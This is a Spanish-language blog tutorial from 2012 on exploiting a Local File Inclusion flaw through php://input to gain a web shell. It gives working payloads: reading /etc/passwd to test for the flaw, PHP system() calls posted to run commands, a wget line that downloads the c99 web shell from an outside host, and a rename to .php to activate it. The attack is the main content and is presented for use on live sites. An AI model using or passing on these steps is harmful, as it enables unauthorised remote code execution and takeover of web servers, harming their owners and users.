sábado, 14 de julio de 2012

Subiendo Shell Explotando LFI via PHP:INPUT


Hola, esta vez les dejare un tutorial, la cual consiste en subir una SHELL explotando la vulnerabilidad LFI via "php:input" , solo basta con inyectar algunos códigos para obtener la misma.


Que es el LFI? 

Es una falla en la programacion de una aplicacion; falla mediante la cual se pueden incluir archivos que se encuentren en el servidor como por ejemplo el /etc/passwd o algun otro archivo de configuracion que nos provea de informacion para atacar el sitio. 

Ahora bien, empecemos...

Algunos de los sitios webs vulnerables a LFI, tienen este aspecto:

www.sitio-web.com/index.php?page=
www.sitio-web.com/index.php?file=

Ahora bien... para comprobar si realmente el sitio web es vulnerable a LFI, tenemos que ver si la web puede leer el "etc/passwd" cosa que el sitio web quedaría de la siguiente forma:

www.sitio-web.com/index.php?page=/etc/passwd 

Si el sitio web puede leer dicho código, la web quedaría asi:


Como vemos en la imagen, ya comprobamos que el sitio web es vulnerable a LFI.

Ahora, haremos el siguiente paso, para subir una shell al servidor.

Necesitaremos lo siguiente:

Navegador: Firefox
Addon: HackBar 


Ahora vamos a tratar de poner este método en acción.



Cargamos la url vulnerable al HackBar e inyectamos el php://input la cual quedaría asi:

www.sitio-web.com/index.php?page=php://input

Habilitamos el "Enable Post data" y colocamos el siguiente comando:

<? system('uname -a'); ?>
Ejemplo:






Otros comandos:

Lista de directorios
<? system ('ls'); ?>


Identificación
<? system ('id'); ?>



Convertir el formato 
<? system ('mv file.txt file.php'); ?>


Descargar
<? system ('wget'); ?>


Ahora, vamos a utilizar el comando <? system ('wget'); ?> para descargar alguna shell en el sitio.


Utilizaremos esta shell en .txt: http://r57.biz/c99.txt

<? system ('wget http://r57.biz/c99.txt'); ?>




Ahora, comprobaremos si la shell se descargo perfectamente, ejecutando el siguiente comando:

<? system ('ls'); ?>

Si la shell, se descargo perfectamente, en este caso lo veremos como c99.txt


Ahora, como ya sabemos que nuestra shell se ejecuto perfectamente, tenemos que cambiarle el formato a .php para poder ingresar a la misma desde el navegador, solo basta con colocar el siguiente comando:

<? system ('mv c99.txt calebbucker.php'); ?>













Ahora, listamos nuevamente los directorios y apreciaremos nuestra shell en .php



Ahora, en este caso nos dirigimos a www.sitio-web.com/calebbucker.php y Voila tenemos nuestra shell!!

No Entendistes?

Observa el VideoTutorial en 1080p HD!

Espero te sirva y lo uses con prudencia.

Saludos.

1 comentario: